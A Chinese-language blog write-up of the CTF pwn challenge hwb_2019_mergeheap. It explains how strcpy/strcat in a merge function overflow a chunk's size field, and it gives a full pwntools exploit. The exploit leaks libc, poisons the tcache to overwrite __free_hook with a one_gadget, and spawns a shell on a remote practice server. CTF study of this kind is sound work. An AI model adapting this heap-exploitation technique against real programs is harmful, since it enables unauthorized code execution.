hwb_2019_mergeheap(str系列的特性)

例行检查我就不放了

漏洞点在merge这个函数

 

 可以看到他将俩chunk进行拼接,并且把chunk的内容复制到新的chunk里面了

但是strcpy和strcat都有着一个特性就是遇到\x00就会停止,

假设我们将0x30和0x38的chunk合并,因为\x00给我们覆盖了所以他就会把下一个chunk的size给覆盖 造成改写chunk的大小,如果改写的chunk大小包含被释放掉的chunk,我们就可以去修改fd指针造成任意写去获得shell

完整exp如下:

from pwn import *

#p = process('./mergeheap')
p = remote('node4.buuoj.cn',26286)

elf = ELF('./mergeheap')
libc = ELF('./libc-2.27.so')

def launch_gdb():
    context.terminal = ['xfce4-terminal','-x','sh','-c']
    gdb.attach(proc.pidof(p)[0])
def ls(index):
    p.sendlineafter('>>',str(index))

def add(size,content):
    ls(1)
    p.sendlineafter('len:',str(size))
    p.sendafter('content:',content)

def show(index):
    ls(2)
    p.sendlineafter('idx:',str(index))
def free(index):
    ls(3)
    p.sendlineafter('idx:',str(index))

def merge(idx1,idx2):
    ls(4)
    p.sendlineafter('idx1:',str(idx1))
    p.sendlineafter('idx2:',str(idx2))

#launch_gdb()

for i in range (8):
    add(0x80,'aaaa\n')

for i in range (1,8):
    free(i)

free(0)
add(8,'aaaaaaaa')
show(0)
p.recvuntil('a'*8)
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-0x3ebd20
print('libc_base--->'+hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
print('free_hook--->'+hex(free_hook))
one = [0x4f2c5,0x4f322,0x10a38c]
one_gadget = libc_base + one[1]
add(0x60,'aaaa\n')#1
add(0x30,'a'*0x30)#2
add(0x38,'a'*0x38)#3
add(0x100,'c\n')#4
add(0x68,'d\n')#5
add(0x20,'c\n')#6
add(0x20,'e\n')#7
add(0x20,'f\n')#8
add(0x20,'g\n')#9

free(5)
free(7)
free(8)

merge(2,3)
free(6)
payload = b'a'*0x28+p64(0x31)+p64(free_hook)+p64(0)+b'\n'
add(0x100,payload)

add(0x20,'aaaa\n')
add(0x20,'aaaa\n')
add(0x20,p64(one_gadget)+b'\n')
free(9)

p.interactive()

结束!!!

 

posted @ 2022-03-05 17:23  庄周恋蝶蝶恋花  阅读(144)  评论(0编辑  收藏  举报